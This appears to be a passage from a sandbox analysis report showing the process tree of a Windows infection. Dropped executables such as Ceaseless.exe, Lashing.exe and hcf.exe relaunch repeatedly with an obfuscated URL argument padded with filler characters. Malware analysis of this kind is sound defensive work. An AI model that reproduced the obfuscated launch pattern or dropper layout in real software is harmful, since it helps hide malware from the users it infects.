  C:\Users\Admin\AppData\Local\Temp\nst731C.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:7284

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2148

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6408

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3752
- C:\Users\Admin\AppData\Local\Temp\nsvAAC6.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsvAAC6.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:6240

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3052

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:3632

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
1⤵
PID:5916
- C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
  "C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
  2⤵
  PID:6448

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5668

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6856

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
1⤵
PID:6676
- C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
  "C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"
  2⤵
  PID:9984

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7592

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5128

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7228
- C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7228.7532.17712185901395158848
  2⤵
  PID:8784
- - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x168,0x16c,0x170,0x144,0x1c0,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
    3⤵
    PID:8340

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7584

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7964

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6596
- C:\Users\Admin\AppData\Local\Temp\nsb5FAE.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsb5FAE.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8692

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7064
- C:\Users\Admin\AppData\Local\Temp\nsr3A92.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsr3A92.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:7192

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:1412

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5156

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6452

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6416

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:9484

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8948

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8980

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8992

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:8760

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8876
- C:\Users\Admin\AppData\Local\Temp\nsy307B.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsy307B.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8472

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9788
- C:\Users\Admin\AppData\Local\Temp\nsh5EEE.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsh5EEE.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:6260

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5216

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4960
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4960 -s 3652
  2⤵
  - Program crash
  PID:7488

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7660

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4960 -ip 4960
1⤵
PID:668

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6288

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8348

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:9504
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 9504 -s 3632
  2⤵
  - Program crash
  PID:9252

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 9504 -ip 9504
1⤵
PID:9844

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
PID:9220

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3924
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3924 -s 3636
  2⤵
  - Program crash
  PID:5600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 3924 -ip 3924
1⤵
PID:5284

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:2360

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8136

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8368

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5972

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5408

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5300

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6072
- C:\Users\Admin\AppData\Local\Temp\nsd79C4.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsd79C4.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8960

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7584

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7464

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6036

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4016

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5420

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9420
- C:\Users\Admin\AppData\Local\Temp\nsi46CD.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsi46CD.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:7400

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9792

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:6616

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:8796
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 8796 -s 3668
  2⤵
  - Executes dropped EXE
  - Program crash
  - Suspicious use of SetWindowsHookEx
  PID:1116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 8796 -ip 8796
1⤵
PID:9388

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2776

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5152

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6696
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 6696 -s 3628
  2⤵
  - Program crash
  PID:9656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 6696 -ip 6696
1⤵
PID:8272

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:7456
